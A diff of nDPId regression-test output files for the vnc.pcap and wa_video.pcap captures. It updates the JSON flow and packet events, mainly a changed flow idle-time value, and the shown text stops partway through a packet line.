-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3545,"source":"vnc.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1476111286462,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1476111286462,"pkt":"xOodxQGGEP7tAkntCABFAAA0AmNAAIAGAADAqAJuX+0w0Br0yWdPW3mt4zw37oASIABT+gAAAgQFtAEDAwgBAQQC"} -00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3546,"source":"vnc.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1476111286499,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1476111286499,"pkt":"EP7tAkntxOodxQGGCABFAAAobe9AAHQGRQ1f7TDQwKgCbslnGvTjPDfuT1t5rlAQQTpSNgAAAAAAAAAA"} -00900{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3548,"source":"vnc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1476111286462,"flow_last_seen":1476111286549,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1476111286549,"l3_proto":"ip4","src_ip":"95.237.48.208","dst_ip":"192.168.2.110","src_port":51559,"dst_port":6900,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}} -00946{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4551,"source":"vnc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1008,"flow_first_seen":1476111286462,"flow_last_seen":1476111290613,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":17966,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1476111290613,"l3_proto":"ip4","src_ip":"95.237.48.208","dst_ip":"192.168.2.110","src_port":51559,"dst_port":6900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}} -00945{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4551,"source":"vnc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":3543,"flow_first_seen":1476111264364,"flow_last_seen":1476111280884,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":64300,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1476111290613,"l3_proto":"ip4","src_ip":"95.237.48.208","dst_ip":"192.168.2.110","src_port":59791,"dst_port":6900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"vnc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1476111264364,"flow_last_seen":1476111264364,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1476111264364,"l3_proto":"ip4","src_ip":"95.237.48.208","dst_ip":"192.168.2.110","src_port":59791,"dst_port":6900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"vnc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1476111264364,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1476111264364,"pkt":"EP7tAkntxOodxQGGCABFAAA0Xs1AAHQGVCNf7TDQwKgCbumPGvTqxTBkAAAAAIACIADbnAAAAgQFrAEDAwIBAQQC"} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"vnc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1476111264364,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1476111264364,"pkt":"xOodxQGGEP7tAkntCABFAAA0fFNAAIAGAADAqAJuX+0w0Br06Y8QfmeF6sUwZYASIABT+gAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"vnc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1476111264402,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1476111264402,"pkt":"EP7tAkntxOodxQGGCABFAAAoXs5AAHQGVC5f7TDQwKgCbumPGvTqxTBlEH5nhlAQQTqDEwAAAAAAAAAA"} +00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"vnc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1476111264364,"flow_last_seen":1476111264453,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1476111264453,"l3_proto":"ip4","src_ip":"95.237.48.208","dst_ip":"192.168.2.110","src_port":59791,"dst_port":6900,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3544,"source":"vnc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1476111286462,"flow_last_seen":1476111286462,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1476111286462,"l3_proto":"ip4","src_ip":"95.237.48.208","dst_ip":"192.168.2.110","src_port":51559,"dst_port":6900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3544,"source":"vnc.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1476111286462,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1476111286462,"pkt":"EP7tAkntxOodxQGGCABFAAA0be5AAHQGRQJf7TDQwKgCbslnGvTjPDftAAAAAIACIAD7xAAAAgQFrAEDAwIBAQQC"} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3545,"source":"vnc.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1476111286462,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1476111286462,"pkt":"xOodxQGGEP7tAkntCABFAAA0AmNAAIAGAADAqAJuX+0w0Br0yWdPW3mt4zw37oASIABT+gAAAgQFtAEDAwgBAQQC"} +00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3546,"source":"vnc.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1476111286499,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1476111286499,"pkt":"EP7tAkntxOodxQGGCABFAAAobe9AAHQGRQ1f7TDQwKgCbslnGvTjPDfuT1t5rlAQQTpSNgAAAAAAAAAA"} +00900{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3548,"source":"vnc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1476111286462,"flow_last_seen":1476111286549,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1476111286549,"l3_proto":"ip4","src_ip":"95.237.48.208","dst_ip":"192.168.2.110","src_port":51559,"dst_port":6900,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}} +00946{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4551,"source":"vnc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1008,"flow_first_seen":1476111286462,"flow_last_seen":1476111290613,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":17966,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1476111290613,"l3_proto":"ip4","src_ip":"95.237.48.208","dst_ip":"192.168.2.110","src_port":51559,"dst_port":6900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}} +00945{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4551,"source":"vnc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":3543,"flow_first_seen":1476111264364,"flow_last_seen":1476111280884,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":64300,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1476111290613,"l3_proto":"ip4","src_ip":"95.237.48.208","dst_ip":"192.168.2.110","src_port":59791,"dst_port":6900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}} 00556{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":4551,"source":"vnc.pcap","alias":"nDPId-test","packets-captured":4551,"packets-processed":4551,"total-skipped-flows":0,"total-l4-data-len":82266,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1476111290613} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 4551/4551 diff --git a/test/results/wa_video.pcap.out b/test/results/wa_video.pcap.out index e9c90776d..09ab66fd6 100644 --- a/test/results/wa_video.pcap.out +++ b/test/results/wa_video.pcap.out @@ -3,10 +3,10 @@ 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455764448,"flow_last_seen":1561455764448,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455764448,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1561455764448,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1561455764448,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAABI0kIAAEARIhLAqAIBwKgC\/+EV4RUANEtUU3BvdFVkcDC64ScQKi2g\/wABAARIlcIDyUSzc\/3fJAksKuG26pMF0apN5Ek="} 00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455764448,"flow_last_seen":1561455764448,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455764448,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455767339,"flow_last_seen":1561455767339,"flow_idle_time":7440000,"flow_min_l4_payload_len":548,"flow_max_l4_payload_len":548,"flow_tot_l4_payload_len":548,"flow_avg_l4_payload_len":548,"midstream":1,"thread_ts_msec":1561455767339,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01213{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1561455767339,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":614,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":614,"pkt_l4_len":580,"thread_ts_msec":1561455767339,"pkt":"xiwDYGpkkLkxKPrKCABFAAJYAABAAEAGw8bAqAIMnfAUNcDLFGab0R+KLuhMzoAYCAC1GwAAAQEICjTPJUoefmf9AAIh+FvbCnh\/a7IflRY0dljac\/EUrviXyMSuBINQo97GbKMEImMXigVRfinz4XcgTWeXa9giOjhsqf3NxGX9biqY1yfPHcFHJiCc0ZCHvaCNvgkJPVj4efQEO9oXblNeeRaKGRLTNPthw+X05ffa2MEEZsCc5sOdGdAvm7FUBTmDLJxrbHLFDC+Qz785Kp4Y\/nNC9dvuMTiwRIaMjyeDYd66NcNSVYXm4FIuAYawjSGgb9SDZkFGOfhJtHvzWqgQNk\/CQvD5MdFqw4Ro6oaWM5dtaU5byhQ5BGyiSFfIOfXO6utXNWA73iF5EEI1sUrW9Z96Yp1YyVWH1nWO8RF0xmRHhUXi8Z\/sZFez1+bI7zqAvAPYQUokFVSdoHMsl0C7omqMhJPL\/hGc9NtDl21eaiXOM52GOzZWxZMbXJmB\/9+NsouXUZBUgsh9jMSFGZLM23GdBqdyDiy78nD8F4EJr2A\/aUaJIwQnw3GNyvDzKtsy8d2KrzMKlf6d7qvFNf6tCn5YbJzbYCtXcK3bzzVNLm8QIxxktFuE4kwqNUk0pOIUno0bVHsn8uJRI7p6utCiNLoFNA283\/oV8xNqLi4LT4fQ\/\/415n+lAj9aAo0RTNMlYFu4h64\/Lu0dkox1O3c7ouf5f6puZ8pmi+uDZVI\/IU8sc3s7dCFETLgaxg8hmXkWbIHTksRKvfJv3iIyf9m9mqHEEfDnGMuE7VsJzvR+Imk61iI="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1561455767391,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1561455767391,"pkt":"kLkxKPrKxiwDYGpkCABFAAA0cX4AAFMGgWyd8BQ1wKgCDBRmwMsu6EzOm9EhroAQALQFAQAAAQEICh5+dS80zyVK"} -02360{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1561455767568,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1454,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1454,"pkt_l4_len":1420,"thread_ts_msec":1561455767568,"pkt":"kLkxKPrKxiwDYGpkCABFAAWgcX8AAFMGe\/+d8BQ1wKgCDBRmwMsu6EzOm9EhroAQALSeYwAAAQEICh5+deo0zyVKAAeY92kokkA7hrw6j6Vhkd+oEkvjt9+mUaq3VF5ALR\/3dyTIUqE+ce9A8zw57IwXMUm48Ve04aN2q3aoE1gIxi914RnbSua9WCw4BiKEAwBPqN8fZa53YGzu6KGDd+y61i8hb8APzgCq0BgVHxbqR0bN2PsZSNYDa\/cxDiPbHbN81oUvSJ1gG1HfKBlexobCedzu2sUfK2Qs2a4k4D1FAWNImtONV8L8QIDh9roN6NGgmn\/lqF1FSp0J1KRgd0jLjFjyO8E83j6fNPMnzyDyrqqDONC2kuu2acMixjEUltdGs477N1jzC9n+ER\/b\/S6TQcGEY9qe321iyRfAWuN0DLg7mjzkOAiLNEYzLk5mIXEf0ZRFKJwDAvOVHtFaYq9PK\/+TyWbUbh9dyV6FAMdUFiad1IPXICQYrOxMJpvYW44GNTJj7JJd\/vptPppVq\/RnqviVF+HvVQYCfsL\/SVoCMkJWYQL1ncdQ0eep1cbBr6nAtINm6y3vpk9iSvMUPjyihT4LCr1goaODAyLUwBnoKlcyQnCzrUTIAqAAM29AsZFrK3bZYGCyGW\/1MqA4MzwyfwMD1bF+saAkWfKpa6RSRkk3KGr6n6v79y+8bFqwHEmh79h64wuCdareEkcN59XiCjPB2jxFRkpLZWY0mc91mPUnIxaHkuQIMuo4JPBhS7O2C4sRkwc2EdliToDywQdgKCedjvE+Fkv+IJ1yiEuAY7OC0Yop8Phr2Qm2qT+26YDaaSkP6CBAA8F\/0qtcGuDnlIq3ve6KW\/D6MuF4EOQk1b\/mWeGOhmO2zaJtvFI8PxQT5VxpwG5mTmAHNrmnqHuX0IWL3zCefnedyGujv7ty3zJnVuQwRLy87IaxzKXwsdyDG3gOFStZBZK2qgn8IW\/xr0PRTCCbF58t6+kmge68BzSwUxMSja0zleeuWy9nliB9zaa4b+jN\/22Q56CpjAU0jeotHbt7rfwSgaDBMBcRXkBKkMuSRjHPsILIfuplVXUe9hbVn7Go2YVn3YMI8\/AExe4f\/h8AveIFQCrjpuBYwwenY\/QBLof\/waMaXnDMoOqv3UDo5f\/rUkCJZYja2kE\/3ozUaT8Uz0PCmt\/gc\/KCFNUf0Dg1W5QGc7mNzo6HmKq3sVYeKZxgXc+0B\/+Kg+WdAj0nr4z70bgW5GCi4QLhKZrELaubvCFff0BZt4Ss2ARFEyAH9IKD4jhRLgOIMULFRSu5xrKXDGooBaqIU\/671otysjRrQ81PzcJeLF2eHbj0voj\/+FWKEGjREDnwIqXWvMaPKFe8PlPupWBMwOzFz8pMa1\/Cfixow4NV+SRN1L2CcfmYjYCb8vwd81S0Sbh\/yjs0qpd5YLoB8pMYh\/yUoZ+FIXdWz+sa2pEUMxHkvUFc+7SzHNfV7LJOOBb6vDyxWLEcl4dY0FU+ynkwQS3op34TZEH4GA2VEfQdOgNR2iu4EKt2LFEXckrFDQqafGZhK5SjyixnKMbzvINk8a1d4ltQPewgraMY4ASPPuLS07U5UPA1qlh8E94Xhh8y1zAB0VWBPRDFRutgl1y4BL0Lad98ZYlvDZMJKhfwsfD1K84zCNVytc0lpEdS4WwTmG5jVDNkEok\/lFTqI9CJ\/ndHCOSY1DeCIemKT8q2EgY6ncZJwmIWq3s+IAWyQwqNpA+uXGEPONBjE53SU6ADJ7J2GkLvQbStohFZjKPShMILgTsEvkwNRe5icjnZF5b4X\/JteDZslY73Nte1q4DiPugbpWEOEW3UaXBVcccSnBXfsrY1lsgjH8BpxoTBACfj\/Nm3cIxvIq14OKHRvxy9b0mNen\/kzoDrO5sZ\/dAjHBdNu5W\/9k529dGB7vwkors="} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455767339,"flow_last_seen":1561455767339,"flow_idle_time":7560000,"flow_min_l4_payload_len":548,"flow_max_l4_payload_len":548,"flow_tot_l4_payload_len":548,"flow_avg_l4_payload_len":548,"midstream":1,"thread_ts_msec":1561455767339,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01213{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1561455767339,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":614,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":614,"pkt_l4_len":580,"thread_ts_msec":1561455767339,"pkt":"xiwDYGpkkLkxKPrKCABFAAJYAABAAEAGw8bAqAIMnfAUNcDLFGab0R+KLuhMzoAYCAC1GwAAAQEICjTPJUoefmf9AAIh+FvbCnh\/a7IflRY0dljac\/EUrviXyMSuBINQo97GbKMEImMXigVRfinz4XcgTWeXa9giOjhsqf3NxGX9biqY1yfPHcFHJiCc0ZCHvaCNvgkJPVj4efQEO9oXblNeeRaKGRLTNPthw+X05ffa2MEEZsCc5sOdGdAvm7FUBTmDLJxrbHLFDC+Qz785Kp4Y\/nNC9dvuMTiwRIaMjyeDYd66NcNSVYXm4FIuAYawjSGgb9SDZkFGOfhJtHvzWqgQNk\/CQvD5MdFqw4Ro6oaWM5dtaU5byhQ5BGyiSFfIOfXO6utXNWA73iF5EEI1sUrW9Z96Yp1YyVWH1nWO8RF0xmRHhUXi8Z\/sZFez1+bI7zqAvAPYQUokFVSdoHMsl0C7omqMhJPL\/hGc9NtDl21eaiXOM52GOzZWxZMbXJmB\/9+NsouXUZBUgsh9jMSFGZLM23GdBqdyDiy78nD8F4EJr2A\/aUaJIwQnw3GNyvDzKtsy8d2KrzMKlf6d7qvFNf6tCn5YbJzbYCtXcK3bzzVNLm8QIxxktFuE4kwqNUk0pOIUno0bVHsn8uJRI7p6utCiNLoFNA283\/oV8xNqLi4LT4fQ\/\/415n+lAj9aAo0RTNMlYFu4h64\/Lu0dkox1O3c7ouf5f6puZ8pmi+uDZVI\/IU8sc3s7dCFETLgaxg8hmXkWbIHTksRKvfJv3iIyf9m9mqHEEfDnGMuE7VsJzvR+Imk61iI="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1561455767391,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1561455767391,"pkt":"kLkxKPrKxiwDYGpkCABFAAA0cX4AAFMGgWyd8BQ1wKgCDBRmwMsu6EzOm9EhroAQALQFAQAAAQEICh5+dS80zyVK"} +02360{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1561455767568,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1454,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1454,"pkt_l4_len":1420,"thread_ts_msec":1561455767568,"pkt":"kLkxKPrKxiwDYGpkCABFAAWgcX8AAFMGe\/+d8BQ1wKgCDBRmwMsu6EzOm9EhroAQALSeYwAAAQEICh5+deo0zyVKAAeY92kokkA7hrw6j6Vhkd+oEkvjt9+mUaq3VF5ALR\/3dyTIUqE+ce9A8zw57IwXMUm48Ve04aN2q3aoE1gIxi914RnbSua9WCw4BiKEAwBPqN8fZa53YGzu6KGDd+y61i8hb8APzgCq0BgVHxbqR0bN2PsZSNYDa\/cxDiPbHbN81oUvSJ1gG1HfKBlexobCedzu2sUfK2Qs2a4k4D1FAWNImtONV8L8QIDh9roN6NGgmn\/lqF1FSp0J1KRgd0jLjFjyO8E83j6fNPMnzyDyrqqDONC2kuu2acMixjEUltdGs477N1jzC9n+ER\/b\/S6TQcGEY9qe321iyRfAWuN0DLg7mjzkOAiLNEYzLk5mIXEf0ZRFKJwDAvOVHtFaYq9PK\/+TyWbUbh9dyV6FAMdUFiad1IPXICQYrOxMJpvYW44GNTJj7JJd\/vptPppVq\/RnqviVF+HvVQYCfsL\/SVoCMkJWYQL1ncdQ0eep1cbBr6nAtINm6y3vpk9iSvMUPjyihT4LCr1goaODAyLUwBnoKlcyQnCzrUTIAqAAM29AsZFrK3bZYGCyGW\/1MqA4MzwyfwMD1bF+saAkWfKpa6RSRkk3KGr6n6v79y+8bFqwHEmh79h64wuCdareEkcN59XiCjPB2jxFRkpLZWY0mc91mPUnIxaHkuQIMuo4JPBhS7O2C4sRkwc2EdliToDywQdgKCedjvE+Fkv+IJ1yiEuAY7OC0Yop8Phr2Qm2qT+26YDaaSkP6CBAA8F\/0qtcGuDnlIq3ve6KW\/D6MuF4EOQk1b\/mWeGOhmO2zaJtvFI8PxQT5VxpwG5mTmAHNrmnqHuX0IWL3zCefnedyGujv7ty3zJnVuQwRLy87IaxzKXwsdyDG3gOFStZBZK2qgn8IW\/xr0PRTCCbF58t6+kmge68BzSwUxMSja0zleeuWy9nliB9zaa4b+jN\/22Q56CpjAU0jeotHbt7rfwSgaDBMBcRXkBKkMuSRjHPsILIfuplVXUe9hbVn7Go2YVn3YMI8\/AExe4f\/h8AveIFQCrjpuBYwwenY\/QBLof\/waMaXnDMoOqv3UDo5f\/rUkCJZYja2kE\/3ozUaT8Uz0PCmt\/gc\/KCFNUf0Dg1W5QGc7mNzo6HmKq3sVYeKZxgXc+0B\/+Kg+WdAj0nr4z70bgW5GCi4QLhKZrELaubvCFff0BZt4Ss2ARFEyAH9IKD4jhRLgOIMULFRSu5xrKXDGooBaqIU\/671otysjRrQ81PzcJeLF2eHbj0voj\/+FWKEGjREDnwIqXWvMaPKFe8PlPupWBMwOzFz8pMa1\/Cfixow4NV+SRN1L2CcfmYjYCb8vwd81S0Sbh\/yjs0qpd5YLoB8pMYh\/yUoZ+FIXdWz+sa2pEUMxHkvUFc+7SzHNfV7LJOOBb6vDyxWLEcl4dY0FU+ynkwQS3op34TZEH4GA2VEfQdOgNR2iu4EKt2LFEXckrFDQqafGZhK5SjyixnKMbzvINk8a1d4ltQPewgraMY4ASPPuLS07U5UPA1qlh8E94Xhh8y1zAB0VWBPRDFRutgl1y4BL0Lad98ZYlvDZMJKhfwsfD1K84zCNVytc0lpEdS4WwTmG5jVDNkEok\/lFTqI9CJ\/ndHCOSY1DeCIemKT8q2EgY6ncZJwmIWq3s+IAWyQwqNpA+uXGEPONBjE53SU6A